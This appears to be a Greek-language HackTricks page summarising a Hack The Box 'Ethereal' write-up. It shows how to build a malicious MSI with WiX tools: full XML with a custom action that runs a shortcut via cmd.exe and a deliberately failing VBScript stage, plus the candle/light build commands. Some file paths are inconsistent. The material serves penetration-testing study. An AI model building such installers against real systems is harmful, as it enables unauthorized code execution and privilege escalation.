7.2 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Δημιουργία Κακόβουλου MSI και Απόκτηση Ρίζας
Η δημιουργία του εγκαταστάτη MSI θα γίνει χρησιμοποιώντας τα wixtools, συγκεκριμένα θα χρησιμοποιηθεί το wixtools. Αξίζει να αναφερθεί ότι δοκιμάστηκαν εναλλακτικοί κατασκευαστές MSI, αλλά δεν ήταν επιτυχείς σε αυτή την περίπτωση.
Για μια ολοκληρωμένη κατανόηση των παραδειγμάτων χρήσης του wix MSI, συνιστάται να συμβουλευτείτε αυτή τη σελίδα. Εδώ μπορείτε να βρείτε διάφορα παραδείγματα που δείχνουν τη χρήση του wix MSI.
Ο στόχος είναι να παραχθεί ένα MSI που θα εκτελεί το αρχείο lnk. Για να επιτευχθεί αυτό, θα μπορούσε να χρησιμοποιηθεί ο παρακάτω κώδικας XML (xml από εδώ):
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>
Είναι σημαντικό να σημειωθεί ότι το στοιχείο Package περιέχει χαρακτηριστικά όπως το InstallerVersion και το Compressed, που καθορίζουν την έκδοση του εγκαταστάτη και υποδεικνύουν αν το πακέτο είναι συμπιεσμένο ή όχι, αντίστοιχα.
Η διαδικασία δημιουργίας περιλαμβάνει τη χρήση του candle.exe, ενός εργαλείου από τα wixtools, για τη δημιουργία ενός wixobject από το msi.xml. Η ακόλουθη εντολή θα πρέπει να εκτελεστεί:
candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml
Επιπλέον, αξίζει να αναφερθεί ότι παρέχεται μια εικόνα στην ανάρτηση, η οποία απεικονίζει την εντολή και την έξοδό της. Μπορείτε να ανατρέξετε σε αυτήν για οπτική καθοδήγηση.
Επιπλέον, το light.exe, ένα άλλο εργαλείο από τα wixtools, θα χρησιμοποιηθεί για να δημιουργήσει το αρχείο MSI από το wixobject. Η εντολή που θα εκτελεστεί είναι η εξής:
light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix
Παρόμοια με την προηγούμενη εντολή, μια εικόνα περιλαμβάνεται στην ανάρτηση που απεικονίζει την εντολή και την έξοδό της.
Παρακαλώ σημειώστε ότι ενώ αυτή η σύνοψη στοχεύει να παρέχει πολύτιμες πληροφορίες, συνιστάται να ανατρέξετε στην αρχική ανάρτηση για πιο λεπτομερείς πληροφορίες και ακριβείς οδηγίες.
Αναφορές
- https://0xrick.github.io/hack-the-box/ethereal/#Creating-Malicious-msi-and-getting-root
- https://www.codeproject.com/Tips/105638/A-quick-introduction-Create-an-MSI-installer-with wixtools
{% hint style="success" %}
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Υποστήριξη HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.